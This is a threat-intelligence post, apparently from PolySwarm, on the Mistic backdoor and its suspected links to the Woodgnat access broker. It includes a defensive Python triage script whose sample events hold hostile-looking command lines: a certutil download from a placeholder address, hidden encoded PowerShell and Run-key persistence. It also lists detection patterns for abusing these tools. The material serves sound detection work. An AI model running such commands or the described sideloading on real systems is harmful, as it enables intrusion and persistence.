
Mistic: New Malware May Signal Evolution in Access Broker Tooling

Written by The Hivemind | Jun 29, 2026 7:02:43 PM

Verticals Targeted: Insurance, Education, Information Technology
Related Families: Mistic, ModeloRAT

Executive Summary

Mistic is a newly identified Windows backdoor observed in cybercrime intrusions since April 2026 that may be linked to the financially motivated initial access broker Woodgnat (aka KongTuke). Industry researchers observed Mistic deployed alongside ModeloRAT in at least one intrusion, providing a potential connection between the malware and an actor previously linked to ransomware operations including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Mistic emphasizes stealth through in-memory code execution, DLL sideloading, and self-deletion capabilities, potentially enabling long-term access while minimizing forensic visibility.

Key Takeaways

  • Mistic is a newly observed Windows backdoor, active since April 2026 and potentially linked to the Woodgnat initial access broker ecosystem.
  • Mistic can execute operator-supplied code directly in memory without writing those payloads to disk and includes a built-in kill switch capable of deleting the malware from compromised systems.
  • The backdoor is delivered through DLL sideloading using legitimate software components, allowing malicious activity to blend into trusted processes and environments.
  • Researchers observed Mistic operating alongside ModeloRAT, a remote access trojan previously associated with ransomware deployment activity.
  • A credential-stealing .NET component displaying a fake login screen was observed alongside Mistic activity, indicating an interest in credential collection in addition to persistent access.
  • The activity targeted organizations across multiple sectors, including insurance, education, and information technology, suggesting opportunistic victim selection consistent with an initial access broker business model.

Background

Available evidence suggests Mistic is designed to provide durable, low-visibility access within enterprise environments. Its reliance on in-memory code execution, trusted-process sideloading, and self-deletion functionality indicates an emphasis on stealth and long-term persistence rather than immediate disruptive activity. While attribution remains low confidence, the observed proximity between Mistic and ModeloRAT activity, combined with separate reporting that Mistic may be delivered through ClickFix infection chains previously associated with Woodgnat operations, warrants continued monitoring of potential links between the malware and the broader Woodgnat ecosystem. Symantec and Carbon Black reported on this activity.

Activity Overview

Symantec researchers first observed Mistic in April 2026 during investigations involving organizations in the insurance, education, information technology, and professional services sectors. The malware was previously documented by Zscaler under the name MLTBackdoor and has since appeared in multiple cybercrime intrusions. Researchers noted that Mistic was deployed alongside ModeloRAT in at least one incident, creating a possible association with the financially motivated initial access broker tracked as Woodgnat.

The malware is deployed through a DLL sideloading chain in which the legitimate executable MpExtMs.exe is made to load attacker-supplied code. A malicious loader hooks the Windows API functions responsible for library loading and path resolution so that the process ultimately loads a malicious DLL named EndpointDlp.dll. The DLL name resembles legitimate Microsoft endpoint security components, which helps the malware blend into trusted enterprise software and evade casual scrutiny: a defender skimming a module list sees a plausible Defender-style file name inside a legitimate, trusted process.

Mistic supports a range of traditional backdoor functions, including file upload and download, file and directory management, changing the command-polling interval, and remote code execution. Its most notable capability is the ability to execute operator-supplied code directly in memory without writing the payload to disk, so the second-stage code never becomes a file that endpoint scanning or disk forensics can recover. The malware also includes a kill switch that lets operators terminate and delete the malware, reducing forensic artifacts and complicating post-incident investigation.

Researchers also observed a .NET credential-stealing component deployed alongside Mistic that presents a fake login screen to harvest credentials from victims. Additional tools observed during the intrusion included PowerShell, WMIC, curl, certutil, net.exe, and reg.exe, demonstrating continued reliance on legitimate administrative utilities alongside custom malware.
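The two observations above (the MpExtMs.exe to EndpointDlp.dll sideload and the reliance on certutil, curl, WMIC, PowerShell, net.exe and reg.exe) translate into hunt logic directly. The script below is an added example written for this post, not code from PolySwarm, Symantec or the malware itself. It runs two heuristic rules over Sysmon-style EventID 7 (ImageLoad) and EventID 1 (ProcessCreate) records. The sample events, paths, user names and the 203.0.113.5 address are constructed for the example; the "same directory as the host EXE", user-writable-path and "not Microsoft-signed" criteria, and the LOLBin command-line patterns, are this example's assumptions and should be tuned to the environment.

```python
"""Heuristic triage of Sysmon-style events for the Mistic tradecraft above.

Added example, not PolySwarm's, Symantec's or the malware's code. Two rules:
  1. sideload - EndpointDlp.dll loaded into MpExtMs.exe from the host EXE's
                own directory, where the DLL is not Microsoft-signed or the
                directory is user-writable (both criteria are assumptions).
  2. lolbin   - process creation of the utilities seen in the intrusion
                (certutil, curl, wmic, powershell, net, reg) with command
                lines matching common abuse patterns (assumed patterns).
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

HOST_EXE = "mpextms.exe"
SIDELOAD_DLL = "endpointdlp.dll"
# Directories an unprivileged user can write to; a vendor DLL is not
# expected to load from here (assumption, tune per environment).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Command-line patterns for the living-off-the-land binaries named above.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "curl.exe": re.compile(r"https?://\S+.*\s(-o|--output)\b", re.I),
    "powershell.exe": re.compile(
        r"-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|downloadstring", re.I),
    "wmic.exe": re.compile(r"process\s+call\s+create", re.I),
    "net.exe": re.compile(r"\b(user|localgroup)\b.*/add", re.I),
    "reg.exe": re.compile(r"\badd\b.*\\currentversion\\run", re.I),
}


@dataclass
class Finding:
    rule: str
    event_id: int
    detail: str


def check_sideload(ev):
    """Sysmon EventID 7 (ImageLoad): flag the MpExtMs.exe -> EndpointDlp.dll pair."""
    if ev.get("EventID") != 7:
        return None
    host = PureWindowsPath(ev["Image"])
    dll = PureWindowsPath(ev["ImageLoaded"])
    if host.name.lower() != HOST_EXE or dll.name.lower() != SIDELOAD_DLL:
        return None
    same_dir = host.parent == dll.parent  # classic sideload layout
    in_writable = str(dll).lower().startswith(USER_WRITABLE)
    not_microsoft = (ev.get("Signed", "false").lower() != "true"
                     or "microsoft" not in ev.get("Signature", "").lower())
    if same_dir and (in_writable or not_microsoft):
        return Finding("sideload", 7, f"{host} loaded {dll} (Signed={ev.get('Signed')})")
    return None


def check_lolbin(ev):
    """Sysmon EventID 1 (ProcessCreate): match abuse patterns per binary."""
    if ev.get("EventID") != 1:
        return None
    name = PureWindowsPath(ev["Image"]).name.lower()
    pattern = LOLBIN_PATTERNS.get(name)
    cmd = ev.get("CommandLine", "")
    if pattern and pattern.search(cmd):
        return Finding(f"lolbin:{name}", 1, cmd)
    return None


def triage(events):
    """Run every rule over every event; return findings in event order."""
    findings = []
    for ev in events:
        for check in (check_sideload, check_lolbin):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


# CONSTRUCTED sample telemetry: paths, users and the 203.0.113.5 test-net
# address are made up for this example, not indicators from the report.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\jdoe\AppData\Local\Temp\upd\MpExtMs.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\upd\EndpointDlp.dll",
     "Signed": "false", "Signature": ""},
    # hypothetical benign layout: same file names, vendor directory, Microsoft-signed
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\MpExtMs.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\EndpointDlp.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/a.dat C:\Users\Public\a.dat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc SQBFAFgAIAA="},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\jdoe\AppData\Local\Temp\upd\MpExtMs.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] EventID={f.event_id}: {f.detail}")
```

Run against the constructed events, the script flags the unsigned EndpointDlp.dll loaded from a Temp directory, the certutil download, the hidden encoded PowerShell launch and the Run-key persistence, and stays quiet on the Microsoft-signed vendor-directory load and the plain Get-Process invocation. The sideload rule deliberately requires the same-directory layout plus either a writable path or a non-Microsoft signer, because the file name alone is exactly what the malware chose to make look benign.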

Who is Woodgnat?

Woodgnat, also publicly tracked as KongTuke, is a financially motivated cybercrime operation active since at least May 2024. The group is primarily assessed to function as an initial access broker, establishing access within victim environments and subsequently selling that access to other threat actors, including ransomware affiliates. Public reporting has linked Woodgnat activity to ransomware operations involving Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.

Woodgnat is known for abusing compromised WordPress infrastructure to deliver evolving social-engineering campaigns including ClickFix, FileFix, and CrashFix techniques. These campaigns ultimately persuade victims to execute attacker-supplied PowerShell commands that facilitate deployment of additional tooling, including ModeloRAT. The group's targeting appears largely opportunistic, reflecting its role as an access broker rather than a sector-focused threat actor.

Analyst Commentary

Mistic reflects a broader trend toward custom malware development within cybercriminal ecosystems associated with ransomware access operations. Rather than relying exclusively on commodity remote access tools and living-off-the-land techniques, threat actors increasingly appear willing to invest in purpose-built malware that improves stealth, resilience, and operational flexibility. Mistic's emphasis on memory-resident execution, trusted-process sideloading, and self-removal functionality highlights the growing importance of behavioral detection, threat hunting, and memory-focused analysis capabilities that extend beyond traditional signature-based security controls.

As new malware families emerge, defenders often face a visibility gap before signatures and intelligence reporting become widely available. PolySwarm can help close that gap by providing access to crowdsourced malware intelligence, multi-engine analysis, related sample discovery, and infrastructure correlations that support faster identification and investigation of emerging threats before they become broadly understood by the security community.

IOCs

PolySwarm has multiple samples associated with this activity. The following are SHA-256 hashes of those samples:

1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984
3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be
afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c
db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5
fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a
59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712
8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235


Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.